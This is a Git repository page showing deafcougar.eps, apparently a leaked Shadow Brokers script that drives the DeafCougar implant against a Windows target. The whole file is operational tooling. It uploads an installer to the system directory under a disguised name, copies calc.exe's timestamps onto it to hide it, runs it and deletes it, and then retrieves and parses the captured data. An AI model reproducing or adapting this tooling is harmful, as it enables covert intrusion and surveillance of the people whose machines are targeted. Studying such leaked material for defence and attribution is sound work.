sneedmca/shadowbrokers-exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
shadowbrokers-exploits/windows/Resources/Ep/Scripts/deafcougar.eps

249 lines
7.2 KiB
PostScript
Raw Normal View History

Inital commit of Shadowbrokers 'Lost in Translation' release
2017-04-14 04:45:07 -05:00
#--------------------------------------------------------
# File: Deafcougar.eps
#
# Script to install/uninstall/collect DC
#--------------------------------------------------------
@include "_FileExists.epm";
@include "_GenericFunctions.epm";
@include "_RecordToolUse.epm";
@echo off;
@case-sensitive off;
string $tool = "DeafCougar";
string $version = "1.0.0.1";
string $capture = "c_41649.nls";
bool $usage_DEPLOYED = false;
bool $usage_EXERCISED = false;
bool $usage_DELETED = false;
string $status="Successful";
bool $temp;
#--------------------------------------------------------
# Get path that EP scripts are run out of
#--------------------------------------------------------
string $ScriptsDir;
_GetEPScriptsPath($ScriptsDir);
int $menuOption;
string $localPath = "$ScriptsDir\\..\\..\\..\\..\\opsdisk\\tools\\deafcougar";
string $dcUploadFile = "enumDrives_installer.exe";
string $localInstallPath = "$localPath\\$dcUploadFile";
string $localParsePath = "$localPath\\decodeenumDrives.exe";
string $fileName = "chkdsk32.exe";
#--------------------------------------------------------
# Get system path
#--------------------------------------------------------
string $systemPath;
ifnot (_GetSystemPath($systemPath)) {
return false;
}
#--------------------------------------------------------
# Check to see if help16.exe exists on the target (shouldn't)
#--------------------------------------------------------
if (_FileExists ($fileName, "$systemPath")) {
$fileName = "winhlp16.exe";
}
echo "";
while (true) {
echo "- $tool $version";
echo "- Capture File: $capture";
echo "";
string $somecmd = "dir c_*9.nls -path $systempath -max 0";
@record on;
ifnot(`$somecmd`){
echo "Could not get dir listing";
@record off;
return false;
}
@record off;
string $dirNames = GetCmdData("name");
string $dirName;
echo "- Output from dir c_*9.nls -path $systempath:";
foreach $dirName ($dirNames){
echo "--- $dirName ";
}
# print the command list
echo "";
echo " (0). Exit";
echo " (1). Set Capture File";
echo " (2). Install";
echo " (3). Uninstall";
echo " (4). Verify Install";
echo " (5). Collect and Parse";
echo " (6). Delete Capture File";
echo "";
$menuOption = GetInput("Enter the desired option");
if ($menuOption == 0) {
#--------------------------------------------------------
# Quit
#--------------------------------------------------------
return true;
} else if ($menuOption == 1) {
echo "Current Capture File = '$capture'";
$capture = GetInput("Enter new capture file name");
} else if ($menuOption == 2) {
if(DcInstall($localInstallPath, $dcUploadFile, $systemPath, $fileName, "-i")) {
echo "success";
_RecordToolUse($tool,$version,"DEPLOYED","Successful");
}
else { echo "failure"; _RecordToolUse($tool,$version,"DEPLOYED","Unuccessful"); }
} else if ($menuOption == 3) {
if(DcInstall($localInstallPath, $dcUploadFile, $systemPath, $fileName, "-u")) { _RecordToolUse($tool,$version,"DELETED","Successful"); }
else { _RecordToolUse($tool,$version,"DELETED","Unsuccessful"); }
} else if ($menuOption == 4) {
if(DcVerify($systemPath)) { _RecordToolUse($tool,$version,"EXERCISED","Successful"); }
else { _RecordToolUse($tool,$version,"EXERCISED","Unsuccessful"); }
} else if ($menuOption == 5) {
ifnot(DcCollect($systemPath, $localParsePath, $capture)){
echo "Collection and parsing could not be completed, please finish manually";
_RecordToolUse($tool,$version,"EXERCISED","Unsuccessful");
}
else { _RecordToolUse($tool,$version,"EXERCISED","Successful"); }
} else if ($menuOption == 6){
if(DcClear($systemPath, $capture)) {
_RecordToolUse($tool,$version,"EXERCISED","Successful"); }
else { _RecordToolUse($tool,$version,"EXERCISED","Unuccessful"); }
} else {
#--------------------------------------------------------
# Invalid menuOption
#--------------------------------------------------------
echo "*** Invalid menuOption ***";
}
pause;
}
return false;
Sub DcInstall(IN string $localInstallPath, IN string $dcUploadFile, IN string $systemPath, IN string $fileName, IN string $command)
{
bool $success = true;
#--------------------------------------------------------
# Install DeafCougar - upload and run with -i option
#--------------------------------------------------------
echo "Uploading $dcUploadFile to $systemPath\\$fileName";
ifnot(`put $localInstallPath -name "$systemPath\\$fileName"`){
echo "Could not put $fileName into $systemPath";
$success = false;
}else{
echo "Matching Times with calc.exe";
'matchtimes "$systemPath\\calc.exe" "$systemPath\\$fileName"';
echo "";
echo "Running $fileName on target...\n";
@echo on;
ifnot(`run -command "$systemPath\\$fileName $command" -redirect`)
{
@echo off;
echo "Could not run $systemPath\\$fileName $command";
$success = false;
}
}
@echo off;
echo "";
echo "Deleting $systemPath\\$fileName";
ifnot(`del $fileName -path $systemPath`){
echo "Could not delete $systemPath\\$fileName";
echo "Please delete it manually";
}
return $success;
}
Sub DcVerify(IN string $systemPath)
{
#--------------------------------------------------------
# Check to see if Deafcougar files exist
#--------------------------------------------------------
bool $logSuccessFlag = true;
bool $driverSuccessFlag = true;
bool $success = true;
if (_FileExists ("credssp.dll", "$systemPath")) {
echo "credssp.dll log file exists ... SUCCESSFUL";
echo "DEAFCOUGAR is on the target!";
} else {
echo "credssp.dll log file missing ... FAILED";
$logSuccessFlag = false;
}
return $success;
}
Sub dcCollect(IN string $systemPath, IN string $localParsePath, IN string $capture)
{
bool $success = true;
#--------------------------------------------------------
# Download Deafcougar and Parse the local file
#--------------------------------------------------------
echo "Getting $systemPath\\$capture...";
echo "";
@record on;
ifnot(`copyget "$systemPath\\$capture"`){
echo "Could not copyget $systemPath\\$capture";
@record off;
return false;
}
@record off;
string $localName = GetCmdData("LocalName");
string $temp = split("_", $localName);
int $counter = 1;
string $fileDate = "";
while ($counter < sizeOf($temp)) {
$fileDate = "$fileDate\_$temp[$counter]";
$counter++;
}
echo "";
echo "";
echo "Parsing file...";
ifnot(`local run -command "$localParsePath Get_Files\\$localName Get_Files\\DC_capture_$filedate.txt"`){
echo "Could not run $localParsePath -tu -i";
$success = false;
}
echo "";
echo "";
sleep 3000;
@echo on;
`local dir *$fileDate* -path "Get_Files"`;
@echo off;
return $success;
}
Sub DcClear(IN string $systemPath, IN string $capture)
{
#--------------------------------------------------------
# Delete Capture File
#--------------------------------------------------------
bool $success = true;
echo "";
echo "Deleting $systemPath\\$capture";
ifnot(`del $capture -path $systemPath`){
echo "Could not delete $systemPath\\$capture";
echo "Please delete it manually";
$success = false;
}
return $success;
}
Reference in a new issue Copy permalink